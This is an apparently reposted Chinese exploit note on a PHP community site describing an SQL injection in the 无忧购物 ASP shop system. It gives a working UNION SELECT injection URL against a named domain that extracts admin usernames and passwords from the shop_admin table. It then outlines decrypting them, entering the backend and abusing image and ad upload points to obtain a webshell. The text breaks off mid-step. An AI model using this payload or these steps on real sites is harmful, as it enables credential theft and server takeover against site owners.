当前位置:  首页  >  服务器技术  >  Linux/unix  >  Linux教程

无忧购物时尚ASP版注入漏洞

作者:JcBolg,利用:http:www.xiaoweio.cnwyshopTEXTBOX.ASP?actionmodifynews%69d122%20and%2012%20union%20select%201,2,3,admin%2bpassword,5,6,7,8%20from%20shop_admin拿到用户名和密码,解密,进入后台,找上传点,存在着上传漏洞,直接拿she

 作者: JcBolg,利用:
http://www.xiaoweio.cn/wyshop/TEXTBOX.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,3,admin%2bpassword,5,6,7,8%20from%20shop_admin

拿到用户名和密码,解密,进入后台,找上传点,存在着上传漏洞,直接拿shell。进入后台,商品管理-商品添加-上传小图片,(广告管理-广告设置这里也有个上传点)在弹出的窗口中,查看源码,在action前面直接添加网站域名,并在后面:

吐了个 "CAO" !
扫码关注 PHP1 官方微信号
PHP1.CN | 中国最专业的PHP中文社区 | PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | PHP问答
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved PHP1.CN 第一PHP社区 版权所有